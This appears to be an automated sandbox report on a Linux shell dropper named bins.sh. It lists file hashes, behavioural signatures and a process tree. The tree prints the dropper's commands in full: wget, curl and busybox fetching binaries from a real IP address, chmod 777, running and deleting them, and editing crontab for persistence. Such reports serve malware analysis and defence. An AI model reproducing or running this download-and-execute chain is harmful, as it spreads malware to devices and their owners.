Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
898d2a8094e95f2f2f209d428d2b92ee
-
SHA1
54d0f3fd153a1d6b01517f1edb40a857c0e99f30
-
SHA256
c92c00e4a850ad8e04046670752a4df1f859bec56c7ab8ec7b79e187d76d11b2
-
SHA512
b35541605c8b1b92212cb1c5ca69ec259257a3fb89fc3d88bd487b1ee81dec4867611b2d0ae14ce7c25cf6a66af314f8ef488d11ce067687626373ceee2af062
-
SSDEEP
192:9l/XbGStJNVIZNW/nDQvP2QcdCSFXbN5NVIZNMnDQvP2QcdCSr:9lySDNVIZNW/nDQvPqNVIZNMnDQvPq
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1948) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodpid Process 687 chmod 716 chmod 753 chmod -
Executes dropped EXE 3 IoCs
Processes:
sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFy0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfyioc pid Process /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr 688 sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF 717 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy 754 y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy -
Renames itself 1 IoCs
Processes:
0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFpid Process 718 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.RI2hfy crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFcurlcrontabdescription ioc Process File opened for reading /proc/104/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/273/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/836/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1016/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/597/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/732/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/901/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/809/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/922/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/20/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/107/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/143/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/833/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/992/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/946/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/986/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1018/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/self/auxv curl File opened for reading /proc/843/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/882/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/790/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/791/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/856/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/908/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/912/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/25/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/270/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/784/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/913/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/937/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/951/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/975/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/796/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/888/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/904/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/780/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/805/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/956/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/827/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/954/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/3/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/740/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/802/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/306/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/973/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/985/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/334/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/819/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/822/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/932/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/13/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/823/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/881/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/1000/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/646/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/914/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/967/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/filesystems crontab File opened for reading /proc/961/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/883/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/997/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/22/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF File opened for reading /proc/816/cmdline 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetcurlbusyboxbusyboxdescription ioc Process File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr wget File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr curl File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr busybox File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF wget File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF curl File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF busybox File opened for modification /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:654
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Writes file to tmp directory
PID:663
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:683
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Writes file to tmp directory
PID:686
-
-
/bin/chmodchmod 777 sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr./sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Executes dropped EXE
PID:688
-
-
/bin/rmrm sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Writes file to tmp directory
PID:691
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Writes file to tmp directory
PID:703
-
-
/bin/chmodchmod 777 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF./0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:717 -
/bin/shsh -c "crontab -l"3⤵PID:719
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:721
-
-
-
/bin/shsh -c "crontab -"3⤵PID:723
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:724
-
-
-
-
/bin/rmrm 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- Writes file to tmp directory
PID:742
-
-
/bin/chmodchmod 777 y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy./y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵PID:756
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD5984f9ba94c29ce9854ac70cc7f835fbc
SHA14647b03175f969a3a69bc5bfab87af571287e116
SHA25662286853b73d320fa3032c28008ef68e3417f841953901a2507406c3f2ace479
SHA512375d3471044536253e25976bf40214f2a8ae627c2a4b826cd78eb0dfc83fd80f6f850b2551a752f0be77f6f5ec123034e02b3a0e2319a6a37b35928f87f71a5b